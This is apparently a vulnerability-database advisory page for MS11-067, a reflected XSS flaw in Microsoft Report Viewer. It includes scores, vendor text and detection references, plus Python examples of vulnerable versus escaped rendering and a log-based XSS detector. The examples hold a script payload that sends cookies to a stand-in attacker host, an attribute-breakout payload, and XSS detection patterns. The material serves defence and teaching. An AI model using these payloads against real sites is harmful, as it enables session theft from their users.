Executive Summary

This alert is flagged as belonging to the CWE/SANS Top 25 Most Dangerous Software Errors (the weakness mapped below is CWE-79, cross-site scripting).
Summary
Title: Vulnerability in Microsoft Report Viewer Could Allow Information Disclosure (2578230)

Information
Name: MS11-067
Vendor: Microsoft
Severity (Vendor): Important
First vendor publication: 2011-08-09
Last vendor modification: 2012-03-13
Revision: 1.1

Security-Database Scoring CVSS v3

CVSS v3 vector: N/A (not scored; no base, temporal, environmental, impact or exploitability sub-scores are available for this entry)

Security-Database Scoring CVSS v2

CVSS v2 vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Base Score: 4.3
Impact Score: 2.9
Exploitability Score: 8.6
Attack Range: Network
Attack Complexity: Medium
Authentication: None Required

Reading the vector: the issue is reachable over the network without authentication, but the attacker needs user interaction (a victim following a crafted link), hence medium complexity; the recorded impact is partial integrity (I:P) with no confidentiality or availability impact. That profile is the standard CVSS v2 scoring of a reflected cross-site scripting flaw, even though the bulletin files the impact under "information disclosure".

Detail

Revision Note: V1.1 (March 13, 2012): Added an entry to the update FAQ to announce a detection change for KB2548826 to correct an installation issue. This is a detection change only. There were no changes to the security update files. Customers who have already successfully updated their systems do not need to take any action.

Summary: This security update resolves a privately reported vulnerability in Microsoft Report Viewer. The vulnerability could allow information disclosure if a user views a specially crafted Web page. In all cases, however, an attacker would have no way to force a user to visit the Web site. Instead, an attacker would have to persuade a user to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes the user to the vulnerable Web site.

Original Source

Url : http://technet.microsoft.com/en-us/security/bulletin/ms11-067

CWE : Common Weakness Enumeration

Weight  Id      Name
100 %   CWE-79  Failure to Preserve Web Page Structure ('Cross-site Scripting') (CWE/SANS Top 25)

OVAL Definitions

Oval ID: oval:org.mitre.oval:def:12773
Title: Report Viewer Controls XSS Vulnerability
Description: Cross-site scripting (XSS) vulnerability in the Report Viewer Control in Microsoft Visual Studio 2005 SP1 and Report Viewer 2005 SP1 allows remote attackers to inject arbitrary web script or HTML via a parameter in a data source, aka "Report Viewer Controls XSS Vulnerability."
Family: windows
Class: vulnerability
Reference(s): CVE-2011-1976
Version: 7
Platform(s): Microsoft Windows XP
Microsoft Windows Vista
Microsoft Windows 7
Microsoft Windows Server 2003
Microsoft Windows Server 2008
Microsoft Windows Server 2008 R2
Product(s): Microsoft Visual Studio 2005
Microsoft Report Viewer 2005

CPE : Common Platform Enumeration

Type         Description   Count
Application  (not listed)  2
Application  (not listed)  1

OpenVAS Exploits

Date Description
2011-08-11 Name : Microsoft Report Viewer Information Disclosure Vulnerability (2578230)
File : nvt/secpod_ms11-067.nasl

Open Source Vulnerability Database (OSVDB)

Id Description
74396 Microsoft Report Viewer Control Unspecified XSS

Microsoft Report Viewer contains a flaw that allows a remote cross-site scripting (XSS) attack. This flaw exists because the application does not validate certain unspecified input passed to the Microsoft Report Viewer control before returning it to the user. This may allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.
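The OSVDB entry above describes the generic shape of a reflected XSS flaw: a server-side control echoes a request parameter into the page without encoding it. The following Python snippet is an added illustration of that pattern and of the fix, not Report Viewer code; the parameter name `title`, the page template and the payload are all invented for the demonstration.

```python
"""Reflected XSS in a server-side control that echoes a request parameter:
vulnerable string concatenation beside its HTML-encoded fix.

Hypothetical illustration; not Report Viewer code. The parameter name
`title`, the page fragments and the payload are constructed for this example."""
import html


def render_vulnerable(title: str) -> str:
    # Echoes the parameter straight into the page body: any markup carried in
    # the request is interpreted by the browser as part of the page.
    return f"<h1>Report: {title}</h1>"


def render_safe(title: str) -> str:
    # HTML-encode for the element-content context before echoing.
    # quote=True also encodes ' and " so the same helper is usable inside a
    # quoted attribute value.
    return f"<h1>Report: {html.escape(title, quote=True)}</h1>"


def render_attr_safe(title: str) -> str:
    # The same value placed in an attribute: encode it and always quote the
    # attribute, so a value cannot terminate it and start a new event handler.
    return f'<input type="text" value="{html.escape(title, quote=True)}">'


# Constructed payload of the kind a reflected-XSS link would carry.
PAYLOAD = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'

# Constructed attribute-context payload: tries to break out of value="..."
ATTR_PAYLOAD = '" onfocus="alert(1)'


def contains_live_script(page: str) -> bool:
    # Crude check used only to contrast the two renderers: a literal <script
    # tag in the response means the browser will execute it.
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(render_attr_safe(ATTR_PAYLOAD))
```

The point of the third renderer is that encoding alone is not enough in attribute context; the attribute must also be quoted, otherwise a value containing a space still grows new attributes.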

Information Assurance Vulnerability Management (IAVM)

Date Description
2011-08-11 IAVM : 2011-B-0099 - Microsoft Report Viewer Information Disclosure Vulnerability
Severity : Category II - VMSKEY : V0029780

Snort® IPS/IDS

Date Description
2014-01-10 Microsoft Report Viewer reflect XSS attempt
RuleID : 19681 - Revision : 5 - Type : OS-WINDOWS
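Network detection of a reflected XSS attempt, as the Snort rule above performs, amounts to inspecting the query string of requests to the vulnerable page for script-like content after undoing URL encoding. The Python below is an added example of that logic run over constructed web-server access-log lines; it is not Snort rule 19681 and does not reproduce its content matches, and the paths, parameter names and client addresses are invented.

```python
"""Heuristic reflected-XSS detection over web-server access-log lines.

Added illustration only: it is not Snort rule 19681 and does not reproduce
its content matches. The log lines, paths and parameter names are constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Tokens that rarely appear in legitimate report parameters.
XSS_MARKERS = re.compile(
    r"<\s*script|javascript\s*:|on(?:error|load|focus|mouseover)\s*=|<\s*img[^>]*src\s*=",
    re.IGNORECASE,
)

# Extracts method and request target from a common-log-format request field.
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(value: str, rounds: int = 3) -> str:
    # Undo repeated percent-encoding, which is used to slip past single-pass
    # filters (%253C -> %3C -> <). Stops early once decoding is stable.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_request(line: str):
    """Return (parameter, decoded_value) for the first suspicious query
    parameter in the request line, or None if nothing matches."""
    m = LOG_LINE.search(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = decode_fully(value)
        if XSS_MARKERS.search(decoded):
            return (name, decoded)
    return None


def scan(lines):
    """Index and finding for every line that carries a suspicious parameter."""
    hits = []
    for idx, line in enumerate(lines):
        hit = flag_request(line)
        if hit:
            hits.append((idx, hit))
    return hits


# Constructed sample log: one normal render, one plain payload, one
# double-encoded payload, one request with no query string.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Aug/2011:10:00:01 +0000] "GET /Reports/Viewer.aspx?rs:Command=Render&ReportName=Sales HTTP/1.1" 200 5120',
    '10.0.0.9 - - [11/Aug/2011:10:00:07 +0000] "GET /Reports/Viewer.aspx?param=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 6402',
    '10.0.0.9 - - [11/Aug/2011:10:00:09 +0000] "GET /Reports/Viewer.aspx?param=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 6402',
    '10.0.0.7 - - [11/Aug/2011:10:00:12 +0000] "POST /Reports/Viewer.aspx HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for idx, (param, value) in scan(SAMPLE_LOG):
        print(f"line {idx}: suspicious parameter {param!r} -> {value!r}")
```

Two caveats a practitioner would add: a POST body is not visible in an access log, so this only catches payloads carried in the URL, and a heuristic like `XSS_MARKERS` will produce false positives on report parameters that legitimately contain markup, so it belongs in a triage pipeline rather than a blocking rule.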

Nessus® Vulnerability Scanner

Date Description
2011-08-09 Name : The remote Windows host contains a web control that could allow information d...
File : smb_nt_ms11-067.nasl - Type : ACT_GATHER_INFO

Alert History

Date  Information
2014-02-17 11:47:05
  • Multiple Updates
2014-01-19 21:30:43
  • Multiple Updates
2013-11-11 12:41:24
  • Multiple Updates